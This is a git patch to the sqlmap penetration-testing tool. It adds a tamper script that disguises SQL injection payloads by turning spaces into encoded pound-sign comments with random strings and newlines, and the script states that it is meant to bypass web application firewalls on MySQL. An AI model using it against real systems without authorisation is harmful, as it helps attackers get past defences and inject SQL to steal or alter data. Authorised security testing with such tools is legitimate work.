From 062c156fc014d0288f42d394732bec4e8faf2f39 Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Fri, 8 Jul 2011 11:03:14 +0000 Subject: [PATCH] Added another tamper script from Roberto Salgado --- tamper/space2morepound.py | 66 +++++++++++++++++++++++++++++++++++++++ tamper/space2pound.py | 2 +- 2 files changed, 67 insertions(+), 1 deletion(-) create mode 100644 tamper/space2morepound.py diff --git a/tamper/space2morepound.py b/tamper/space2morepound.py new file mode 100644 index 000000000..73a3eac8a --- /dev/null +++ b/tamper/space2morepound.py @@ -0,0 +1,66 @@ +#!/usr/bin/env python + +""" +$Id$ + +Copyright (c) 2006-2011 sqlmap developers (http://www.sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +import os +import re +import random +import string + +from lib.core.common import singleTimeWarnMessage +from lib.core.data import kb +from lib.core.enums import DBMS +from lib.core.enums import PRIORITY +from lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS + +__priority__ = PRIORITY.LOW + +def dependencies(): + singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s > 5.1.13" % (os.path.basename(__file__)[:-3], DBMS.MYSQL)) + +def tamper(payload): + """ + Replaces space character (' ') with a pound character ('#') followed by + a random string and a new line ('\n') + + Example: + * Input: 1 AND 9227=9227 + * Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227 + + Requirement: + * MySQL >= 5.1.13 + + Tested against: + * MySQL 5.1.41 + + Notes: + * Useful to bypass several web application firewalls + """ + + def process(match): + word = match.group('word') + randomStr = ''.join(random.choice(string.ascii_uppercase + string.lowercase) for x in range(random.randint(6, 12))) + + if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS: + return match.group().replace(word, "%s%%23%s%%0A" % (word, randomStr)) + else: + return match.group() + + retVal = "" + + if payload: + payload = re.sub(r"(?<=\W)(?P[A-Za-z_]+)(?=\W|\Z)", lambda match: process(match), payload) + + for i in xrange(len(payload)): + if payload[i].isspace(): + randomStr = ''.join(random.choice(string.ascii_uppercase + string.lowercase) for x in range(random.randint(6, 12))) + retVal += "%%23%s%%0A" % randomStr + else: + retVal += payload[i] + + return retVal diff --git a/tamper/space2pound.py b/tamper/space2pound.py index 76b1aa988..5cccdf3bd 100644 --- a/tamper/space2pound.py +++ b/tamper/space2pound.py @@ -33,7 +33,7 @@ def tamper(payload): * MySQL Tested against: - * MySQL 5.0 + * MySQL 4.0, 5.0 Notes: * Useful to bypass several web application firewalls